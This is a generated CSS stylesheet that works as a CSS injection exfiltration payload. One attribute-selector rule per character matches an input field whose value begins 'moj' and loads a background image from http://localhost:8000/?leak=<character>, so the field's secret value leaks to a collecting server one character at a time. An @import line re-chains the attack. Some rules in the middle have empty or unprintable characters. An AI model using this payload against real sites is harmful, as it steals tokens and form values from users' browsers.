@import url("http://localhost:8000/?l=5");
input[value="moj!"] {background: url("http://localhost:8000/?leak=!&q=0.7251857714506569");}
input[value="moj\""] {background: url("http://localhost:8000/?leak=\"&q=0.733253846570407");}
input[value="moj#"] {background: url("http://localhost:8000/?leak=#&q=0.18086876590222678");}
input[value="moj$"] {background: url("http://localhost:8000/?leak=$&q=0.16209813238330129");}
input[value="moj%"] {background: url("http://localhost:8000/?leak=%&q=0.9035698110261221");}
input[value="moj&"] {background: url("http://localhost:8000/?leak=&&q=0.8515435325125691");}
input[value="moj'"] {background: url("http://localhost:8000/?leak='&q=0.04926695478671994");}
input[value="moj("] {background: url("http://localhost:8000/?leak=(&q=0.9183143678017378");}
input[value="moj)"] {background: url("http://localhost:8000/?leak=)&q=0.025273573458637122");}
input[value="moj*"] {background: url("http://localhost:8000/?leak=*&q=0.9306795840072901");}
input[value="moj+"] {background: url("http://localhost:8000/?leak=+&q=0.14174685102890705");}
input[value="moj,"] {background: url("http://localhost:8000/?leak=,&q=0.14669645661879338");}
input[value="moj-"] {background: url("http://localhost:8000/?leak=-&q=0.9385086485045835");}
input[value="moj."] {background: url("http://localhost:8000/?leak=.&q=0.16251607284488512");}
input[value="moj/"] {background: url("http://localhost:8000/?leak=/&q=0.5798563216042605");}
input[value="moj0"] {background: url("http://localhost:8000/?leak=0&q=0.4073828433415352");}
input[value="moj1"] {background: url("http://localhost:8000/?leak=1&q=0.7266634608536593");}
input[value="moj2"] {background: url("http://localhost:8000/?leak=2&q=0.46176766329808494");}
input[value="moj3"] {background: url("http://localhost:8000/?leak=3&q=0.2797163148695607");}
input[value="moj4"] {background: url("http://localhost:8000/?leak=4&q=0.027019184009656083");}
input[value="moj5"] {background: url("http://localhost:8000/?leak=5&q=0.7110200073837076");}
input[value="moj6"] {background: url("http://localhost:8000/?leak=6&q=0.5867868846786746");}
input[value="moj7"] {background: url("http://localhost:8000/?leak=7&q=0.7356691179778396");}
input[value="moj8"] {background: url("http://localhost:8000/?leak=8&q=0.29447392787606486");}
input[value="moj9"] {background: url("http://localhost:8000/?leak=9&q=0.4072412321362848");}
input[value="moj:"] {background: url("http://localhost:8000/?leak=:&q=0.38682647386596325");}
input[value="moj;"] {background: url("http://localhost:8000/?leak=;&q=0.03150271624785894");}
input[value="moj<"] {background: url("http://localhost:8000/?leak=<&q=0.05725856691981246");}
input[value="moj="] {background: url("http://localhost:8000/?leak==&q=0.5049029028295846");}
input[value="moj>"] {background: url("http://localhost:8000/?leak=>&q=0.8987525189629859");}
input[value="moj?"] {background: url("http://localhost:8000/?leak=?&q=0.0006610910111417567");}
input[value="moj@"] {background: url("http://localhost:8000/?leak=@&q=0.05833197387841382");}
input[value="mojA"] {background: url("http://localhost:8000/?leak=A&q=0.32210186273103325");}
input[value="mojB"] {background: url("http://localhost:8000/?leak=B&q=0.14139364683419986");}
input[value="mojC"] {background: url("http://localhost:8000/?leak=C&q=0.10466780815123444");}
input[value="mojD"] {background: url("http://localhost:8000/?leak=D&q=0.30498809836440777");}
input[value="mojE"] {background: url("http://localhost:8000/?leak=E&q=0.8088414109556181");}
input[value="mojF"] {background: url("http://localhost:8000/?leak=F&q=0.7963563471426782");}
input[value="mojG"] {background: url("http://localhost:8000/?leak=G&q=0.20343783145771877");}
input[value="mojH"] {background: url("http://localhost:8000/?leak=H&q=0.3956011515179323");}
input[value="mojI"] {background: url("http://localhost:8000/?leak=I&q=0.5133184863572371");}
input[value="mojJ"] {background: url("http://localhost:8000/?leak=J&q=0.8222443731589959");}
input[value="mojK"] {background: url("http://localhost:8000/?leak=K&q=0.4122267531931534");}
input[value="mojL"] {background: url("http://localhost:8000/?leak=L&q=0.6427829950191966");}
input[value="mojM"] {background: url("http://localhost:8000/?leak=M&q=0.9536535436369196");}
input[value="mojN"] {background: url("http://localhost:8000/?leak=N&q=0.5011101881403774");}
input[value="mojO"] {background: url("http://localhost:8000/?leak=O&q=0.43845058570204865");}
input[value="mojP"] {background: url("http://localhost:8000/?leak=P&q=0.4167411923570432");}
input[value="mojQ"] {background: url("http://localhost:8000/?leak=Q&q=0.8156760114515738");}
input[value="mojR"] {background: url("http://localhost:8000/?leak=R&q=0.1387225103380214");}
input[value="mojS"] {background: url("http://localhost:8000/?leak=S&q=0.09272323714634934");}
input[value="mojT"] {background: url("http://localhost:8000/?leak=T&q=0.06118849223562428");}
input[value="mojU"] {background: url("http://localhost:8000/?leak=U&q=0.7243048252963746");}
input[value="mojV"] {background: url("http://localhost:8000/?leak=V&q=0.44394740781279185");}
input[value="mojW"] {background: url("http://localhost:8000/?leak=W&q=0.41596453536573375");}
input[value="mojX"] {background: url("http://localhost:8000/?leak=X&q=0.9134025635048417");}
input[value="mojY"] {background: url("http://localhost:8000/?leak=Y&q=0.23604812915442142");}
input[value="mojZ"] {background: url("http://localhost:8000/?leak=Z&q=0.6035727523114851");}
input[value="moj["] {background: url("http://localhost:8000/?leak=[&q=0.9073850484218613");}
input[value="moj\\"] {background: url("http://localhost:8000/?leak=\\&q=0.4411774891982454");}
input[value="moj]"] {background: url("http://localhost:8000/?leak=]&q=0.9113579217915362");}
input[value="moj^"] {background: url("http://localhost:8000/?leak=^&q=0.7911967389543277");}
input[value="moj_"] {background: url("http://localhost:8000/?leak=_&q=0.9494811353778061");}
input[value="moj`"] {background: url("http://localhost:8000/?leak=`&q=0.737755365123971");}
input[value="moja"] {background: url("http://localhost:8000/?leak=a&q=0.3469240132424358");}
input[value="mojb"] {background: url("http://localhost:8000/?leak=b&q=0.5914268747499143");}
input[value="mojc"] {background: url("http://localhost:8000/?leak=c&q=0.37938080905494376");}
input[value="mojd"] {background: url("http://localhost:8000/?leak=d&q=0.24919507436982524");}
input[value="moje"] {background: url("http://localhost:8000/?leak=e&q=0.15079584517820122");}
input[value="mojf"] {background: url("http://localhost:8000/?leak=f&q=0.2468706772176681");}
input[value="mojg"] {background: url("http://localhost:8000/?leak=g&q=0.6100819638863615");}
input[value="mojh"] {background: url("http://localhost:8000/?leak=h&q=0.07105550356526824");}
input[value="moji"] {background: url("http://localhost:8000/?leak=i&q=0.725987586298195");}
input[value="mojj"] {background: url("http://localhost:8000/?leak=j&q=0.32849917405989104");}
input[value="mojk"] {background: url("http://localhost:8000/?leak=k&q=0.9305929481358548");}
input[value="mojl"] {background: url("http://localhost:8000/?leak=l&q=0.2921214432013446");}
input[value="mojm"] {background: url("http://localhost:8000/?leak=m&q=0.6235551529921188");}
input[value="mojn"] {background: url("http://localhost:8000/?leak=n&q=0.5133970153860863");}
input[value="mojo"] {background: url("http://localhost:8000/?leak=o&q=0.6719247371712997");}
input[value="mojp"] {background: url("http://localhost:8000/?leak=p&q=0.05296696584960281");}
input[value="mojq"] {background: url("http://localhost:8000/?leak=q&q=0.6495365240223334");}
input[value="mojr"] {background: url("http://localhost:8000/?leak=r&q=0.9558025147944051");}
input[value="mojs"] {background: url("http://localhost:8000/?leak=s&q=0.8426045698868907");}
input[value="mojt"] {background: url("http://localhost:8000/?leak=t&q=0.680163793845489");}
input[value="moju"] {background: url("http://localhost:8000/?leak=u&q=0.8362293219294872");}
input[value="mojv"] {background: url("http://localhost:8000/?leak=v&q=0.9072355925984943");}
input[value="mojw"] {background: url("http://localhost:8000/?leak=w&q=0.28516094157442295");}
input[value="mojx"] {background: url("http://localhost:8000/?leak=x&q=0.4742630696050816");}
input[value="mojy"] {background: url("http://localhost:8000/?leak=y&q=0.05806721956056271");}
input[value="mojz"] {background: url("http://localhost:8000/?leak=z&q=0.9413442946024555");}
input[value="moj{"] {background: url("http://localhost:8000/?leak={&q=0.9000378829003242");}
input[value="moj|"] {background: url("http://localhost:8000/?leak=|&q=0.7797601681005424");}
input[value="moj}"] {background: url("http://localhost:8000/?leak=}&q=0.7295790989141957");}
input[value="moj~"] {background: url("http://localhost:8000/?leak=~&q=0.051855371218380464");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.36272574021989956");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.6138512414508999");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.2314134854585923");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.9392100780360153");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.93138471002319");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.34862594239976774");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.42401552530261455");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.3398446734050107");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.17888817524957923");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.6356874772960981");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.2832884853665987");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.3781113936141005");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.9327732220329259");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.1633719400480076");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.12081407530457211");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.38648060808869");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.44009131723501316");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.04538750922958146");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.10887197625104283");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.48569874992769324");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.01282970559648855");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.4910522793714185");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.9768664248570746");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.6339641945976537");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.8000641019885408");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.33664550842369034");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.019767221525001988");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.5497769255861868");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.8889926221818802");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.32458161855231804");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.8065063201100642");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.9037064835478774");}
input[value="moj"] {background: url("http://localhost:8000/?leak=&q=0.6632370116197928");}
input[value="moj "] {background: url("http://localhost:8000/?leak= &q=0.05904389624912776");}
input[value="moj¡"] {background: url("http://localhost:8000/?leak=¡&q=0.8033638570741299");}
input[value="moj¢"] {background: url("http://localhost:8000/?leak=¢&q=0.487952560277791");}
input[value="moj£"] {background: url("http://localhost:8000/?leak=£&q=0.6799851649510955");}
input[value="moj¤"] {background: url("http://localhost:8000/?leak=¤&q=0.771186060021886");}
input[value="moj¥"] {background: url("http://localhost:8000/?leak=¥&q=0.7504373522948649");}
input[value="moj¦"] {background: url("http://localhost:8000/?leak=¦&q=0.280198238522829");}
input[value="moj§"] {background: url("http://localhost:8000/?leak=§&q=0.5356273640236924");}
input[value="moj¨"] {background: url("http://localhost:8000/?leak=¨&q=0.6792810765159363");}
input[value="moj©"] {background: url("http://localhost:8000/?leak=©&q=0.5598419259176224");}
input[value="mojª"] {background: url("http://localhost:8000/?leak=ª&q=0.20193598366183463");}
input[value="moj«"] {background: url("http://localhost:8000/?leak=«&q=0.7662608193867875");}
input[value="moj¬"] {background: url("http://localhost:8000/?leak=¬&q=0.1411513620632554");}
input[value="moj­"] {background: url("http://localhost:8000/?leak=­&q=0.7218712738465323");}
input[value="moj®"] {background: url("http://localhost:8000/?leak=®&q=0.468866690734127");}
input[value="moj¯"] {background: url("http://localhost:8000/?leak=¯&q=0.017724010016103797");}
input[value="moj°"] {background: url("http://localhost:8000/?leak=°&q=0.9912812155045696");}
input[value="moj±"] {background: url("http://localhost:8000/?leak=±&q=0.6435558001501609");}
input[value="moj²"] {background: url("http://localhost:8000/?leak=²&q=0.5950952804550038");}
input[value="moj³"] {background: url("http://localhost:8000/?leak=³&q=0.7569017170030741");}
input[value="moj´"] {background: url("http://localhost:8000/?leak=´&q=0.41192236361796675");}
input[value="mojµ"] {background: url("http://localhost:8000/?leak=µ&q=0.5630931659480429");}
input[value="moj¶"] {background: url("http://localhost:8000/?leak=¶&q=0.14744245935106082");}
input[value="moj·"] {background: url("http://localhost:8000/?leak=·&q=0.23601157614544022");}
input[value="moj¸"] {background: url("http://localhost:8000/?leak=¸&q=0.9973130417457379");}
input[value="moj¹"] {background: url("http://localhost:8000/?leak=¹&q=0.24785465273039864");}
input[value="mojº"] {background: url("http://localhost:8000/?leak=º&q=0.8955992897069474");}
input[value="moj»"] {background: url("http://localhost:8000/?leak=»&q=0.6148933197724789");}
input[value="moj¼"] {background: url("http://localhost:8000/?leak=¼&q=0.08662973290086828");}
input[value="moj½"] {background: url("http://localhost:8000/?leak=½&q=0.7783174251009508");}
input[value="moj¾"] {background: url("http://localhost:8000/?leak=¾&q=0.5784160632651347");}
input[value="moj¿"] {background: url("http://localhost:8000/?leak=¿&q=0.4111154535586905");}
input[value="mojÀ"] {background: url("http://localhost:8000/?leak=À&q=0.9698684382403098");}
input[value="mojÁ"] {background: url("http://localhost:8000/?leak=Á&q=0.16400401014727617");}
input[value="mojÂ"] {background: url("http://localhost:8000/?leak=Â&q=0.019575455952603793");}
input[value="mojÃ"] {background: url("http://localhost:8000/?leak=Ã&q=0.8877689811605198");}
input[value="mojÄ"] {background: url("http://localhost:8000/?leak=Ä&q=0.1615366891715586");}
input[value="mojÅ"] {background: url("http://localhost:8000/?leak=Å&q=0.3232754500056225");}
input[value="mojÆ"] {background: url("http://localhost:8000/?leak=Æ&q=0.16291141628342687");}
input[value="mojÇ"] {background: url("http://localhost:8000/?leak=Ç&q=0.8754335834780085");}
input[value="mojÈ"] {background: url("http://localhost:8000/?leak=È&q=0.704960585275799");}
input[value="mojÉ"] {background: url("http://localhost:8000/?leak=É&q=0.9100766141580288");}
input[value="mojÊ"] {background: url("http://localhost:8000/?leak=Ê&q=0.9357658956862462");}
input[value="mojË"] {background: url("http://localhost:8000/?leak=Ë&q=0.13097842016958183");}
input[value="mojÌ"] {background: url("http://localhost:8000/?leak=Ì&q=0.03319378448411925");}
input[value="mojÍ"] {background: url("http://localhost:8000/?leak=Í&q=0.9399099238779589");}
input[value="mojÎ"] {background: url("http://localhost:8000/?leak=Î&q=0.8089184555876163");}
input[value="mojÏ"] {background: url("http://localhost:8000/?leak=Ï&q=0.0255726470143276");}
input[value="mojÐ"] {background: url("http://localhost:8000/?leak=Ð&q=0.8619948834979467");}
input[value="mojÑ"] {background: url("http://localhost:8000/?leak=Ñ&q=0.5584319268953803");}
input[value="mojÒ"] {background: url("http://localhost:8000/?leak=Ò&q=0.602249395674664");}
input[value="mojÓ"] {background: url("http://localhost:8000/?leak=Ó&q=0.7915476859188273");}
input[value="mojÔ"] {background: url("http://localhost:8000/?leak=Ô&q=0.7354479349746958");}
input[value="mojÕ"] {background: url("http://localhost:8000/?leak=Õ&q=0.9951405475979394");}
input[value="mojÖ"] {background: url("http://localhost:8000/?leak=Ö&q=0.32703208107462123");}
input[value="moj×"] {background: url("http://localhost:8000/?leak=×&q=0.6732290870247275");}
input[value="mojØ"] {background: url("http://localhost:8000/?leak=Ø&q=0.0016976493411053895");}
input[value="mojÙ"] {background: url("http://localhost:8000/?leak=Ù&q=0.7551422832810621");}
input[value="mojÚ"] {background: url("http://localhost:8000/?leak=Ú&q=0.7484070047199878");}
input[value="mojÛ"] {background: url("http://localhost:8000/?leak=Û&q=0.6452345635578529");}
input[value="mojÜ"] {background: url("http://localhost:8000/?leak=Ü&q=0.9846415738141248");}
input[value="mojÝ"] {background: url("http://localhost:8000/?leak=Ý&q=0.40648807472004433");}
input[value="mojÞ"] {background: url("http://localhost:8000/?leak=Þ&q=0.17762300366313188");}
input[value="mojß"] {background: url("http://localhost:8000/?leak=ß&q=0.9629622300042702");}
input[value="mojà"] {background: url("http://localhost:8000/?leak=à&q=0.9662688726035755");}
input[value="mojá"] {background: url("http://localhost:8000/?leak=á&q=0.34982568943126835");}
input[value="mojâ"] {background: url("http://localhost:8000/?leak=â&q=0.4451378815511382");}
input[value="mojã"] {background: url("http://localhost:8000/?leak=ã&q=0.036553644159236676");}
input[value="mojä"] {background: url("http://localhost:8000/?leak=ä&q=0.5698684388348969");}
input[value="mojå"] {background: url("http://localhost:8000/?leak=å&q=0.1528478085345215");}
input[value="mojæ"] {background: url("http://localhost:8000/?leak=æ&q=0.906933343144553");}
input[value="mojç"] {background: url("http://localhost:8000/?leak=ç&q=0.7636886843709412");}
input[value="mojè"] {background: url("http://localhost:8000/?leak=è&q=0.8084427155063565");}
input[value="mojé"] {background: url("http://localhost:8000/?leak=é&q=0.33240298427117687");}
input[value="mojê"] {background: url("http://localhost:8000/?leak=ê&q=0.799058707724615");}
input[value="mojë"] {background: url("http://localhost:8000/?leak=ë&q=0.5049720789144547");}
input[value="mojì"] {background: url("http://localhost:8000/?leak=ì&q=0.287483740648103");}
input[value="mojí"] {background: url("http://localhost:8000/?leak=í&q=0.6246858652182832");}
input[value="mojî"] {background: url("http://localhost:8000/?leak=î&q=0.9870301021051884");}
input[value="mojï"] {background: url("http://localhost:8000/?leak=ï&q=0.9304743482439721");}
input[value="mojð"] {background: url("http://localhost:8000/?leak=ð&q=0.4247743305978935");}
input[value="mojñ"] {background: url("http://localhost:8000/?leak=ñ&q=0.7643963413743322");}
input[value="mojò"] {background: url("http://localhost:8000/?leak=ò&q=0.774947474474712");}
input[value="mojó"] {background: url("http://localhost:8000/?leak=ó&q=0.386432633358484");}
input[value="mojô"] {background: url("http://localhost:8000/?leak=ô&q=0.11023741838326129");}
input[value="mojõ"] {background: url("http://localhost:8000/?leak=õ&q=0.9077505825526442");}
input[value="mojö"] {background: url("http://localhost:8000/?leak=ö&q=0.39346809228049673");}
input[value="moj÷"] {background: url("http://localhost:8000/?leak=÷&q=0.6915267734621646");}
input[value="mojø"] {background: url("http://localhost:8000/?leak=ø&q=0.8072237374234472");}
input[value="mojù"] {background: url("http://localhost:8000/?leak=ù&q=0.02073689905218945");}
input[value="mojú"] {background: url("http://localhost:8000/?leak=ú&q=0.053547184902801304");}
input[value="mojû"] {background: url("http://localhost:8000/?leak=û&q=0.014426473517941796");}
input[value="mojü"] {background: url("http://localhost:8000/?leak=ü&q=0.542272734182222");}
input[value="mojý"] {background: url("http://localhost:8000/?leak=ý&q=0.030689417829472987");}
input[value="mojþ"] {background: url("http://localhost:8000/?leak=þ&q=0.5894267667757402");}
input[value="mojÿ"] {background: url("http://localhost:8000/?leak=ÿ&q=0.4874582350742711");}
